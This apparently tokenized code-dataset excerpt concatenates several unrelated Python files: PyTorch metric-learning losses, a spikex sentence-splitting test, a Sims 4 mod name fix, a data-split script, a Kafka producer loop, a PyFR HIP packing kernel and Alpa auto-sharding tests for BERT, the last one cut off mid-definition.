pos_loss=torch.nn.functional.relu(d_ap-beta+self.margin)<line_sep>neg_loss=torch.nn.functional.relu(beta-d_an+self.margin)<line_sep>#Compute normalization constant
pair_count=torch.sum((pos_loss<g>0.)+(neg_loss<g>0.)).type(torch.cuda.FloatTensor)<line_sep>#Actual Margin Loss
loss=torch.sum(pos_loss+neg_loss)<if>pair_count<eq>0.<else>torch.sum(pos_loss+neg_loss)/pair_count<line_sep>#(Optional) Add regularization penalty on betas.
<if_stmt>self.nu<block_start>loss=loss+beta_regularisation_loss.type(torch.cuda.FloatTensor)<block_end><return>loss<block_end><block_end>"""================================================================================================="""<line_sep>### ProxyNCALoss containing trainable class proxies. Works independent of batch size.
<class_stmt>ProxyNCALoss(torch.nn.Module)<block_start><def_stmt>__init__ self num_proxies embedding_dim<block_start>"""
Basic ProxyNCA Loss as proposed in 'No Fuss Distance Metric Learning using Proxies'.
Args:
num_proxies: int, number of proxies to use to estimate data groups. Usually set to number of classes.
embedding_dim: int, Required to generate initial proxies which are the same size as the actual data embeddings.
Returns:
Nothing!
"""<line_sep>super(ProxyNCALoss self).__init__()<line_sep>self.num_proxies=num_proxies<line_sep>self.embedding_dim=embedding_dim<line_sep>self.PROXIES=torch.nn.Parameter(torch.randn(num_proxies self.embedding_dim)/8)<line_sep>self.all_classes=torch.arange(num_proxies)<block_end><def_stmt>forward self batch labels<block_start>"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
proxynca loss (torch.Tensor(), batch-averaged)
"""<line_sep>#Normalize batch in case it is not normalized (which should never be the case for ProxyNCA, but still).
#Same for the PROXIES. Note that the multiplication by 3 seems arbitrary, but helps the actual training.
batch=3<times>torch.nn.functional.normalize(batch dim=1)<line_sep>PROXIES=3<times>torch.nn.functional.normalize(self.PROXIES dim=1)<line_sep>#Group required proxies
pos_proxies=torch.stack([PROXIES[pos_label:pos_label+1 :]<for>pos_label labels])<line_sep>neg_proxies=torch.stack([torch.cat([self.all_classes[:class_label] self.all_classes[class_label+1:]])<for>class_label labels])<line_sep>neg_proxies=torch.stack([PROXIES[neg_labels :]<for>neg_labels neg_proxies])<line_sep>#Compute Proxy-distances
dist_to_neg_proxies=torch.sum((batch[: <none> :]-neg_proxies).pow(2) dim=-1)<line_sep>dist_to_pos_proxies=torch.sum((batch[: <none> :]-pos_proxies).pow(2) dim=-1)<line_sep>#Compute final proxy-based NCA loss
negative_log_proxy_nca_loss=torch.mean(dist_to_pos_proxies[: 0]+torch.logsumexp(-dist_to_neg_proxies dim=1))<line_sep><return>negative_log_proxy_nca_loss<block_end><block_end>"""================================================================================================="""<class_stmt>CEClassLoss(torch.nn.Module)<block_start><def_stmt>__init__ self inp_dim n_classes<block_start>"""
Basic Cross Entropy Loss for reference. Can be useful.
Contains its own mapping network, so the actual network can remain untouched.
Args:
inp_dim: int, embedding dimension of network.
n_classes: int, number of target classes.
Returns:
Nothing!
"""<line_sep>super(CEClassLoss self).__init__()<line_sep>self.mapper=torch.nn.Sequential(torch.nn.Linear(inp_dim n_classes))<line_sep>self.ce_loss=torch.nn.CrossEntropyLoss()<block_end><def_stmt>forward self batch labels<block_start>"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
cross-entropy loss (torch.Tensor(), batch-averaged by default)
"""<line_sep><return>self.ce_loss(self.mapper(batch) labels.type(torch.cuda.LongTensor))<block_end><block_end> |
<import_from_stmt>spikex.defaults spacy_version<import_from_stmt>spikex.pipes SentX<line_sep>SENTS=["This is a bullet list that we want to be a unique sentence:\n"<concat>"\ta) the first bullet;\n"<concat>"\tb) the second bullet;\n"<concat>"\tc) a bullet with nested bullets:\n"<concat>"\t\t1) first nested bullet;"<concat>"\t\t2) second nested bullet."<concat>"\td) last bullet.\n" "Paragraph title " "The title was misformatted with the text. " "Now we try to split on abbreviations like Figs. 1 or Fig. 2. " "They can create confusion, like No.42 or eg. Num. 42 or U.S.; " "these are some cases, but there could it be more out there." ]<def_stmt>test_splitta nlp<block_start>sentx_pipe=SentX()<if>spacy_version<l>3<else>"sentx"<line_sep>nlp.add_pipe(sentx_pipe before="parser")<line_sep>doc=nlp("".join(SENTS))<assert_stmt>len([s<for>s doc.sents])<eq>len(SENTS)<block_end> |
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""<line_sep># The purpose of this file is to fix the fact that when trying to access the "full_name" attribute on Sims an empty string is returned.
# noinspection PyBroadException
<import_from_stmt>sims.sim_info SimInfo<import_from_stmt>sims4communitylib.modinfo ModInfo<import_from_stmt>sims4communitylib.utils.common_injection_utils CommonInjectionUtils<import_from_stmt>sims4communitylib.utils.sims.common_sim_name_utils CommonSimNameUtils<import_from_stmt>sims4communitylib.utils.sims.common_sim_utils CommonSimUtils<line_sep>@CommonInjectionUtils.inject_safely_into(ModInfo.get_identity() SimInfo 'full_name')<def_stmt>_common_fix_full_name_returning_empty_string original self:SimInfo *_ **__<block_start>original_value=original(self *_ **__)<if_stmt>original_value<eq>''<block_start><return>CommonSimNameUtils.get_full_name(CommonSimUtils.get_sim_info(self))<block_end><return>original_value<block_end> |
"""
Convenience classes for experiments, including monitoring and stop criteria.
"""<line_sep> |
"""
This code conduct:
1. exclude a subset of data related to a certain illumination condition from an existing training set
2. keep a subset of data related to the same illumination condition from an existing test set
ATTENTION: this code require to run prepare_data_split.py first
Author: <NAME> (<EMAIL>)
Date: March, 2020
"""<import_stmt>os<import_stmt>os.path<as>ops<if_stmt>__name__<eq>'__main__'<block_start>batch_size=8# use to ignore the last for convenience
# exclude subsets from train
name_pattens_to_exclude=['/00/' '/01/' '/06/' '/07/']<line_sep>output_folder='../data_splits/illus_chg/'<if_stmt><not>ops.exists(output_folder)<block_start>os.makedirs(output_folder)<block_end>lines_train=[]<line_sep>json_file_path="../data_splits/standard/train.json"<assert_stmt>ops.exists(json_file_path) '{:s} not exist'.format(json_file_path)<with_stmt>open(json_file_path)<as>f<block_start>lines_i=f.readlines()<block_end>f.close()<for_stmt>line lines_i<block_start>to_discard=<false><for_stmt>name_patten name_pattens_to_exclude<block_start><if_stmt>name_patten<in>line<block_start>to_discard=<true><line_sep><break><block_end><block_end><if_stmt><not>to_discard<block_start>lines_train.append(line)<block_end><block_end>lines_train=lines_train[:len(lines_train)<floordiv>batch_size<times>batch_size]<with_stmt>open(output_folder+'/train.json' 'w')<as>f<block_start>f.writelines("%s"%l<for>l lines_train)<block_end>f.close()<line_sep>#########################################################################################
# include subsets in test
name_pattens_to_include=['/00/' '/01/' '/06/' '/07/']<line_sep>lines_test=[]<line_sep>json_file_path="../data_splits/standard/test.json"<assert_stmt>ops.exists(json_file_path) '{:s} not exist'.format(json_file_path)<with_stmt>open(json_file_path)<as>f<block_start>lines_i=f.readlines()<block_end>f.close()<for_stmt>line lines_i<block_start>to_discard=<false><for_stmt>name_patten name_pattens_to_include<block_start><if_stmt>name_patten<in>line<block_start>lines_test.append(line)<block_end><block_end><block_end>lines_test=lines_test[:len(lines_test)<floordiv>batch_size<times>batch_size]<with_stmt>open(output_folder+'/test.json' 'w')<as>f<block_start>f.writelines("%s"%l<for>l lines_test)<block_end>f.close()<block_end> |
<import_from_stmt>kafka KafkaProducer<line_sep>producer=KafkaProducer(bootstrap_servers="127.0.0.1:9092")<for_stmt>_ range(10000)<block_start>producer.send("my_topic" b"message")<line_sep># producer.flush()
<block_end> |
# -*- coding: utf-8 -*-
<import_from_stmt>pyfr.backends.base NullKernel<import_from_stmt>pyfr.backends.hip.provider HIPKernel HIPKernelProvider get_grid_for_block <class_stmt>HIPPackingKernels(HIPKernelProvider)<block_start><def_stmt>pack self mv<block_start>hip=self.backend.hip<line_sep># An exchange view is simply a regular view plus an exchange matrix
m,v=mv.xchgmat mv.view<line_sep># Compute the grid and thread-block size
block=(128 1 1)<line_sep>grid=get_grid_for_block(block v.n)<line_sep># Render the kernel template
src=self.backend.lookup.get_template('pack').render(blocksz=block[0])<line_sep># Build
kern=self._build_kernel('pack_view' src 'iiiPPPP')<line_sep># Set the arguments
params=kern.make_params(grid block)<line_sep>params.set_args(v.n v.nvrow v.nvcol v.basedata v.mapping v.rstrides<or>0 m)<line_sep># If MPI is HIP aware then we just need to pack the buffer
<if_stmt>self.backend.mpitype<eq>'hip-aware'<block_start><class_stmt>PackXchgViewKernel(HIPKernel)<block_start><def_stmt>add_to_graph self graph deps<block_start><pass><block_end><def_stmt>run self stream<block_start>kern.exec_async(stream params)<block_end><block_end><block_end># Otherwise, we need to both pack the buffer and copy it back
<else_stmt><block_start><class_stmt>PackXchgViewKernel(HIPKernel)<block_start><def_stmt>add_to_graph self graph deps<block_start><pass><block_end><def_stmt>run self stream<block_start>kern.exec_async(stream params)<line_sep>hip.memcpy(m.hdata m.data m.nbytes stream)<block_end><block_end><block_end><return>PackXchgViewKernel(mats=[mv])<block_end><def_stmt>unpack self mv<block_start>hip=self.backend.hip<if_stmt>self.backend.mpitype<eq>'hip-aware'<block_start><return>NullKernel()<block_end><else_stmt><block_start><class_stmt>UnpackXchgMatrixKernel(HIPKernel)<block_start><def_stmt>add_to_graph self graph deps<block_start><pass><block_end><def_stmt>run self stream<block_start>hip.memcpy(mv.data mv.hdata mv.nbytes stream)<block_end><block_end><return>UnpackXchgMatrixKernel(mats=[mv])<block_end><block_end><block_end> |
"""Test auto sharding on transformer layers and bert models."""<import_stmt>unittest<import_stmt>jax<import_stmt>jax.numpy<as>jnp<import_stmt>numpy<as>np<import_from_stmt>flax optim linen<as>nn<import_from_stmt>alpa parallelize ShardParallel LocalPhysicalDeviceMesh AutoShardingOption<import_from_stmt>alpa.model.bert_model BertConfig FlaxBertLayerCollection FlaxBertForMaskedLMModule <import_from_stmt>alpa.util count_communication_primitives<import_from_stmt>test_auto_sharding_mlp assert_all_replicated assert_close assert_column_partitioned assert_data_parallel_cost assert_fully_sharded assert_less_equal assert_sharded assert_replicated_column_partitioned assert_replicated_row_partitioned assert_row_partitioned is_fully_sharded assert_sharding_zero_stage_3 <class_stmt>AutoShardingAttentionTest(unittest.TestCase)<block_start><def_stmt>setUp self<block_start><assert_stmt>len(jax.local_devices())<ge>4<line_sep>self.physical_mesh=LocalPhysicalDeviceMesh(jax.local_devices()[:4])<line_sep>self.as_option=AutoShardingOption()<block_end><def_stmt>get_device_mesh self shape mesh_alpha mesh_beta<block_start><return>self.physical_mesh.get_logical_mesh(shape mesh_alpha mesh_beta)<block_end><def_stmt>run_bert_layers self batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh<block_start>@parallelize(method=ShardParallel(devices=device_mesh auto_sharding_option=self.as_option))<def_stmt>train_step optimizer batch deterministic apply_fn<block_start><def_stmt>loss_func params<block_start>rngs={"dropout":batch["rng"]}<line_sep>out=apply_fn(params batch["hidden_states"] batch["attention_mask"] deterministic rngs=rngs)[0]<line_sep><return>jnp.mean((out-batch["label"])<power>2)<block_end>grad=jax.grad(loss_func)(optimizer.target)<line_sep>new_optimizer=optimizer.apply_gradient(grad)<line_sep><return>new_optimizer<block_end># Init model and optimizer
hidden_states=jnp.ones((batch_size seq_len hidden_size) dtype=jnp.float32)<line_sep>attention_mask=jnp.ones((batch_size seq_len) dtype=jnp.int32)<line_sep>label=jnp.ones((batch_size seq_len hidden_size) dtype=jnp.float32)<line_sep>model=FlaxBertLayerCollection(BertConfig(num_hidden_layers=num_layers hidden_size=hidden_size intermediate_size=hidden_size<times>4 num_attention_heads=num_heads gradient_checkpointing=use_remat))<line_sep>rngkey=jax.random.PRNGKey(0)<line_sep>params=model.init(rngkey hidden_states attention_mask)<line_sep>optimizer=optim.Adam(1e-2).create(params)<line_sep># JIT compile
optimizer=train_step(optimizer {"hidden_states":hidden_states "attention_mask":attention_mask "label":label "rng":rngkey} deterministic model.apply)<line_sep># Get optimized HLO IR
executable=train_step.get_executable(optimizer {"hidden_states":hidden_states "attention_mask":attention_mask "label":label "rng":rngkey} deterministic model.apply)<line_sep><return>(optimizer executable.get_hlo_text() executable.auto_sharding_objective)<block_end><def_stmt>run_bert_mlm self batch_size seq_len num_layers hidden_size num_heads vocab_size deterministic device_mesh<block_start>@parallelize(method=ShardParallel(devices=device_mesh auto_sharding_option=self.as_option))<def_stmt>train_step optimizer batch<block_start><def_stmt>loss_func params<block_start>rngs={"dropout":batch["rng"]}<line_sep>logits=model.apply(params batch["input_ids"] batch["attention_mask"] batch["token_type_ids"] batch["position_ids"] deterministic=deterministic rngs=rngs)[0]<line_sep>label_mask=jnp.where(batch["labels"]<g>0 1.0 0.0)<line_sep>labels=jax.nn.one_hot(batch["labels"] logits.shape[-1])<line_sep>loss=-jnp.sum(labels<times>jax.nn.log_softmax(logits axis=-1) axis=-1)<line_sep><return>(label_mask<times>loss).sum()/label_mask.sum()<times>0.1234<block_end>grad=jax.grad(loss_func)(optimizer.target)<line_sep>new_optimizer=optimizer.apply_gradient(grad)<line_sep><return>new_optimizer<block_end># Init model and optimizer
input_ids=jnp.ones((batch_size seq_len) dtype=jnp.int32)<line_sep>attention_mask=jnp.ones((batch_size seq_len) dtype=jnp.int32)<line_sep>token_type_ids=jnp.ones((batch_size seq_len) dtype=jnp.int32)<line_sep>position_ids=jnp.ones((batch_size seq_len) dtype=jnp.int32)<line_sep>labels=jnp.ones((batch_size seq_len) dtype=jnp.int32)<line_sep>model=FlaxBertForMaskedLMModule(BertConfig(num_hidden_layers=num_layers hidden_size=hidden_size intermediate_size=hidden_size<times>4 num_attention_heads=num_heads vocab_size=vocab_size max_position_embeddings=seq_len ))<line_sep>rngkey=jax.random.PRNGKey(0)<line_sep>params=model.init(rngkey input_ids attention_mask token_type_ids position_ids)<line_sep>optimizer=optim.Adam(1e-2).create(params)<line_sep># JIT compile
optimizer=train_step(optimizer {"input_ids":input_ids "attention_mask":attention_mask "token_type_ids":token_type_ids "position_ids":position_ids "labels":labels "rng":rngkey})<line_sep># Get optimized HLO IR
executable=train_step.get_executable(optimizer {"input_ids":input_ids "attention_mask":attention_mask "token_type_ids":token_type_ids "position_ids":position_ids "labels":labels "rng":rngkey})<line_sep><return>(optimizer executable.get_hlo_text() executable.auto_sharding_objective)<block_end><def_stmt>test_bert_layer_data_parallel self<block_start>batch_size=64<line_sep>seq_len=64<line_sep>num_layers=2<line_sep>hidden_size=32<line_sep>num_heads=8<line_sep>deterministic=<false><line_sep>use_remat=<false><line_sep># Test on different logical mesh shapes
<for_stmt>i,mesh_shape enumerate([(4 1) (1 4)])<block_start>device_mesh=self.get_device_mesh(mesh_shape [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep>assert_data_parallel_cost(optimizer hlo_ir objective device_mesh self.as_option i)<block_end><block_end><def_stmt>test_bert_layer_model_parallel self<block_start>batch_size=8<line_sep>seq_len=8<line_sep>num_layers=2<line_sep>hidden_size=128<line_sep>num_heads=8<line_sep>deterministic=<false><line_sep>use_remat=<false><line_sep># Test on different logical mesh shapes
<for_stmt>i,mesh_shape enumerate([(4 1) (1 4)])<block_start>device_mesh=self.get_device_mesh(mesh_shape [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep># Check communication cost
expected=(num_layers<times>4-1)<times>device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4 i)<line_sep>assert_close(objective expected)<line_sep>n_total,n_all_reduce,n_all_gather,n_reduce_scatter,_=(count_communication_primitives(hlo_ir))<if_stmt>self.as_option.prefer_reduce_scatter<block_start><assert_stmt>n_total<eq>num_layers<times>4-1<assert_stmt>n_all_reduce<eq>num_layers<times>4-1<assert_stmt>n_total<eq>n_all_reduce<block_end><else_stmt><block_start><assert_stmt>n_total<eq>num_layers<times>4-1<assert_stmt>n_all_reduce<eq>num_layers<times>4-1<assert_stmt>n_total<eq>n_all_reduce<block_end># Check sharding specification
<for_stmt>k range(num_layers)<block_start>params=optimizer.target["params"][str(k)]<line_sep>weights=[params["attention"]["self"]["qvk_combined"]["kernel"] params["attention"]["output"]["dense"]["kernel"] params["intermediate"]["dense"]["kernel"] params["output"]["dense"]["kernel"] ]<for_stmt>j range(len(weights))<block_start><if_stmt>j%2<eq>0<block_start>assert_column_partitioned(weights[j] mesh_shape[i] i)<block_end><else_stmt><block_start>assert_row_partitioned(weights[j] mesh_shape[i] i)<block_end><block_end><block_end><block_end><block_end><def_stmt>test_bert_layer_2d_mesh self<block_start>batch_size=8<line_sep>seq_len=8<line_sep>num_layers=2<line_sep>hidden_size=128<line_sep>num_heads=8<line_sep>deterministic=<false><line_sep>use_remat=<false><line_sep># Test on different logical mesh shapes
mesh_shape=[2 2]<line_sep>device_mesh=self.get_device_mesh(mesh_shape [2 2] [1 0.1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep># Check communication cost
params=jax.tree_util.tree_leaves(optimizer.target)<line_sep>expected=(sum(device_mesh.all_reduce_cost(np.prod(x.shape)<times>4/mesh_shape[1] 0)<for>x params)+device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4/mesh_shape[0] 1)<times>(num_layers<times>4-1))<line_sep>assert_close(objective expected)<line_sep>n_total,n_all_reduce,n_all_gather,n_reduce_scatter,_=(count_communication_primitives(hlo_ir ignore_scalar_all_reduce=<true>))<if_stmt>self.as_option.prefer_reduce_scatter<block_start><assert_stmt>n_all_reduce<eq>num_layers<times>4-1<assert_stmt>n_reduce_scatter<eq>2<assert_stmt>n_all_gather<eq>1<assert_stmt>n_total<eq>n_all_reduce+n_reduce_scatter+n_all_gather<block_end><else_stmt><block_start><assert_stmt>n_all_reduce<eq>num_layers<times>4<assert_stmt>n_total<eq>n_all_reduce<block_end># Check sharding specification
<if_stmt>self.as_option.prefer_reduce_scatter<block_start><for_stmt>weight jax.tree_util.tree_leaves(optimizer.state.param_states)<block_start><if_stmt>len(weight.shape)<g>1<block_start>assert_fully_sharded(weight)<block_end><block_end><block_end><else_stmt><block_start><for_stmt>k range(num_layers)<block_start>params=optimizer.target["params"][str(k)]<line_sep>weights=[params["attention"]["self"]["qvk_combined"]["kernel"] params["attention"]["output"]["dense"]["kernel"] params["intermediate"]["dense"]["kernel"] params["output"]["dense"]["kernel"] ]<for_stmt>j range(len(weights))<block_start><if_stmt>j%2<eq>0<block_start>assert_replicated_column_partitioned(weights[j] mesh_shape)<block_end><else_stmt><block_start>assert_replicated_row_partitioned(weights[j] mesh_shape)<block_end><block_end><block_end><block_end><block_end><def_stmt>test_bert_layer_force_batch_dim_mapping self<block_start>batch_size=64<line_sep>seq_len=64<line_sep>num_layers=2<line_sep>hidden_size=32<line_sep>num_heads=8<line_sep>deterministic=<false><line_sep>use_remat=<false><line_sep>self.as_option.force_batch_dim_to_mesh_dim=0<line_sep># data parallel
device_mesh=self.get_device_mesh([4 1] [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep>assert_data_parallel_cost(optimizer hlo_ir objective device_mesh self.as_option 0)<line_sep># model parallel (case 1)
device_mesh=self.get_device_mesh([1 4] [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep>expected=(num_layers<times>4-1)<times>device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4 1)<line_sep>assert_close(objective expected)<line_sep># model parallel (case 2)
batch_size=1<line_sep>device_mesh=self.get_device_mesh([1 4] [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep>expected=(num_layers<times>4-1)<times>device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4 1)<line_sep>assert_close(objective expected)<block_end><def_stmt>test_embedding_2d_mesh self<block_start>vocab_size=1024<line_sep>hidden_size=8<line_sep>batch_size=8<line_sep>seq_len=8<line_sep>mesh_shape=[2 2]<line_sep># Model and training step definition
<class_stmt>Model(nn.Module)<block_start>"""Tied input and output embedding."""<def_stmt>setup self<block_start>self.embed=nn.Embed(vocab_size hidden_size)<block_end><def_stmt>__call__ self x<block_start>x=self.embed(x)<line_sep>embed=self.embed.variables["params"]["embedding"]<line_sep>x=x@embed.T<line_sep><return>x<block_end><block_end>logical_mesh=self.get_device_mesh(mesh_shape [1 1] [1 1])<line_sep>@parallelize(method=ShardParallel(devices=logical_mesh))<def_stmt>func optimizer x y<block_start><def_stmt>loss_func params<block_start>out=model.apply(params x)<line_sep>y_=jax.nn.one_hot(y out.shape[-1])<line_sep>loss=-jnp.sum(y_<times>jax.nn.log_softmax(out axis=-1) axis=-1)<line_sep><return>loss.sum()<block_end>grad=jax.grad(loss_func)(optimizer.target)<line_sep>new_optimizer=optimizer.apply_gradient(grad)<line_sep><return>new_optimizer<block_end># Init model and optimizer
x=jnp.ones((batch_size seq_len) np.int32)<line_sep>y=jnp.ones((batch_size seq_len) np.int32)<line_sep>model=Model()<line_sep>rngkey=jax.random.PRNGKey(0)<line_sep>params=model.init(rngkey x)<line_sep>optimizer=optim.Adam(1e-2).create(params)<line_sep># JIT Compile
optimize=func(optimizer x y)<line_sep># Check communication cost
executable=func.get_executable(optimizer x y)<line_sep>hlo_ir=executable.get_hlo_text()<line_sep>objective=executable.auto_sharding_objective<line_sep>params=jax.tree_util.tree_leaves(optimizer.target)<line_sep>expected=(logical_mesh.all_reduce_cost(vocab_size<times>hidden_size<times>4/mesh_shape[1] 0)+logical_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4/mesh_shape[0] 1)<times>2+logical_mesh.all_reduce_cost(batch_size<times>seq_len<times>4/mesh_shape[0] 1)<times>2)<line_sep>assert_close(objective expected)<line_sep>n_total,n_all_reduce,n_all_gather,n_reduce_scatter,_=(count_communication_primitives(hlo_ir))<assert_stmt>n_total<eq>n_all_reduce<block_end><def_stmt>test_bert_mlm_data_parallel self<block_start>batch_size=32<line_sep>seq_len=32<line_sep>num_layers=2<line_sep>hidden_size=16<line_sep>num_heads=4<line_sep>vocab_size=128<line_sep>deterministic=<false><line_sep># Test on different logical mesh shapes
<for_stmt>i,mesh_shape enumerate([(4 1) (1 4)])<block_start>device_mesh=self.get_device_mesh(mesh_shape [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_mlm(batch_size seq_len num_layers hidden_size num_heads vocab_size deterministic device_mesh)<if_stmt>self.as_option.force_zero_stage_3# only the weight and opt_state of token_embed is not sharded
<block_start>assert_sharding_zero_stage_3(optimizer 3)<line_sep><continue><block_end>assert_data_parallel_cost(optimizer hlo_ir objective device_mesh self.as_option i 1)<block_end><block_end>@unittest.skip("This test is broken after we disallow some replicated iota.")<def_stmt>test_bert_mlm_model_parallel self<block_start>batch_size=16<line_sep>seq_len=16<line_sep>num_layers=2<line_sep>hidden_size=128<line_sep>num_heads=4<line_sep>vocab_size=512<line_sep>deterministic=<false><line_sep>self.as_option.allow_all_gather=<false># Temporary hack
self.as_option.allow_all_to_all=<false># Temporary hack
# Test on different logical mesh shapes
<for_stmt>i,mesh_shape enumerate([(4 1) (1 4)])<block_start>device_mesh=self.get_device_mesh(mesh_shape [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_mlm(batch_size seq_len num_layers hidden_size num_heads vocab_size deterministic device_mesh)<line_sep># Check communication cost
# expected_cost = embed.forward (1) + embed.backward(2) +
# LM_head.forward (1) + LM_head.backward (1) +
# LM_head.weight.backward (1) + log_softmax.forward (2) +
# transformer.forward (2 * num_layers) + transformer.backward (2 * num_layers)
#
# Note that the final cost is different from this estimated cost in ILP solver.
# The SPMD partitioner will eliminate some unnecessary communication in favor of
# redundant computation (e.g., it will elimiate the all-reduce in embed.backward).
expected=(device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4 i)<times>5+device_mesh.all_reduce_cost(hidden_size<times>hidden_size<times>4 i)+device_mesh.all_reduce_cost(batch_size<times>seq_len<times>4 i)<times>2+device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4 i)<times>num_layers<times>4)<line_sep>assert_close(objective expected)<line_sep>n_total,n_all_reduce,n_all_gather,n_reduce_scatter,_=(count_communication_primitives(hlo_ir))<line_sep># real number of all-reduce = transformers (4 * num_layers) + log_softmax (2) +
# embed.forward (1) + embad.backward (1)
<assert_stmt>n_all_reduce<eq>num_layers<times>4+4<assert_stmt>n_total<eq>n_all_reduce<line_sep># Check sharding specification
embed_weight=optimizer.target["params"]["bert"]["embeddings"]["word_embeddings"]["embedding"]<line_sep>lm_head=optimizer.target["params"]["cls"]["predictions"]["transform"]["dense"]["kernel"]<line_sep>assert_row_partitioned(embed_weight mesh_shape[i] i)<line_sep>assert_all_replicated(lm_head np.prod(mesh_shape))<for_stmt>k range(num_layers)<block_start>params=optimizer.target["params"]["bert"]["encoder"]["layer"][str(k)]<line_sep>weights=[params["attention"]["self"]["qvk_combined"]["kernel"] params["attention"]["output"]["dense"]["kernel"] params["intermediate"]["dense"]["kernel"] params["output"]["dense"]["kernel"] ]<for_stmt>j range(len(weights))<block_start><if_stmt>j%2<eq>0<block_start>assert_column_partitioned(weights[j] mesh_shape[i] i)<block_end><else_stmt><block_start>assert_row_partitioned(weights[j] mesh_shape[i] i)<block_end><block_end><block_end><block_end><block_end><def_stmt>test_bert_mlm_2d_mesh self<block_start>batch_size=4<line_sep>seq_len=4<line_sep>num_layers=2<line_sep>hidden_size=512<line_sep>num_heads=4<line_sep>vocab_size=4096<line_sep>deterministic=<false><line_sep># To generate the desired strategy, we have to turn off mixed mesh shape and all-gather
# and enable recomputing heavy ops.
self.as_option.allow_recompute_heavy_op=<true><line_sep>self.as_option.allow_all_gather=<false><line_sep>self.as_option.allow_mixed_mesh_shape=<false><line_sep>mesh_shape=[2 2]<line_sep>device_mesh=self.get_device_mesh(mesh_shape [2 2] [1 0.1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_mlm(batch_size seq_len num_layers hidden_size num_heads vocab_size deterministic device_mesh)<line_sep># Check communication cost.
n_total,n_all_reduce,n_all_gather,n_reduce_scatter,_=(count_communication_primitives(hlo_ir ignore_scalar_all_reduce=<true>))<if_stmt>self.as_option.prefer_reduce_scatter<block_start><assert_stmt>n_all_reduce<eq>4<times>num_layers+2+2<assert_stmt>n_reduce_scatter<le>3# The correct number should be 2,
# but GpuMultiOutputFusion can make
# some reduce-scatter unable to be combined
<assert_stmt>n_all_gather<eq>1<assert_stmt>n_total<eq>n_all_reduce+n_all_gather+n_reduce_scatter<block_end><else_stmt># real number of all-reduce = transformers (4 * num_layers) + log_softmax (2) +
# embed.forward (1) + embad.backward (1) + weights (1)
<block_start><assert_stmt>n_all_reduce<eq>4<times>num_layers+2+2+1<assert_stmt>n_total<eq>n_all_reduce<block_end># Check sharding specification
<assert_stmt>"s32[4,4,4096]{2,1,0} iota()"<not><in>hlo_ir<assert_stmt>"s32[2,4,2048]{2,1,0} iota()"<in>hlo_ir<if_stmt>self.as_option.prefer_reduce_scatter<block_start>num_not_sharded=0# allow the token_type_embeddings not partitioned.
<for_stmt>weight jax.tree_util.tree_leaves(optimizer.state.param_states)<block_start><if_stmt>len(weight.shape)<g>1<block_start><if_stmt><not>is_fully_sharded(weight)<block_start>num_not_sharded<augadd>1<block_end><block_end><block_end><assert_stmt>num_not_sharded<le>2<block_end><else_stmt><block_start>embed_weight=(optimizer.target["params"]["bert"]["embeddings"]["word_embeddings"]["embedding"])<line_sep>lm_head=(optimizer.target["params"]["cls"]["predictions"]["transform"]["dense"]["kernel"])<line_sep>assert_replicated_row_partitioned(embed_weight mesh_shape)<line_sep>assert_all_replicated(lm_head np.prod(mesh_shape))<for_stmt>k range(num_layers)<block_start>params=optimizer.target["params"]["bert"]["encoder"]["layer"][str(k)]<line_sep>weights=[params["attention"]["self"]["qvk_combined"]["kernel"] params["attention"]["output"]["dense"]["kernel"] params["intermediate"]["dense"]["kernel"] params["output"]["dense"]["kernel"] ]<for_stmt>j range(len(weights))<block_start><if_stmt>j%2<eq>0<block_start>assert_replicated_column_partitioned(weights[j] mesh_shape)<block_end><else_stmt><block_start>assert_replicated_row_partitioned(weights[j] mesh_shape)<block_end><block_end><block_end><block_end><block_end><def_stmt>test_bert_layer_data_parallel_reduce_scatter self<block_start>self.as_option.prefer_reduce_scatter=<true><line_sep>self.test_bert_layer_data_parallel()<block_end><def_stmt>test_bert_layer_model_parallel_reduce_scatter self<block_start>self.as_option.prefer_reduce_scatter=<true><line_sep>self.test_bert_layer_model_parallel()<block_end><def_stmt>test_bert_layer_2d_mesh_reduce_scatter self<block_start>self.as_option.prefer_reduce_scatter=<true><line_sep>self.test_bert_layer_2d_mesh()<block_end><def_stmt>test_bert_mlm_data_parallel_reduce_scatter self<block_start>self.as_option.prefer_reduce_scatter=<true><line_sep>self.test_bert_mlm_data_parallel()<block_end><def_stmt>test_bert_mlm_data_parallel_reduce_scatter_zero_3 
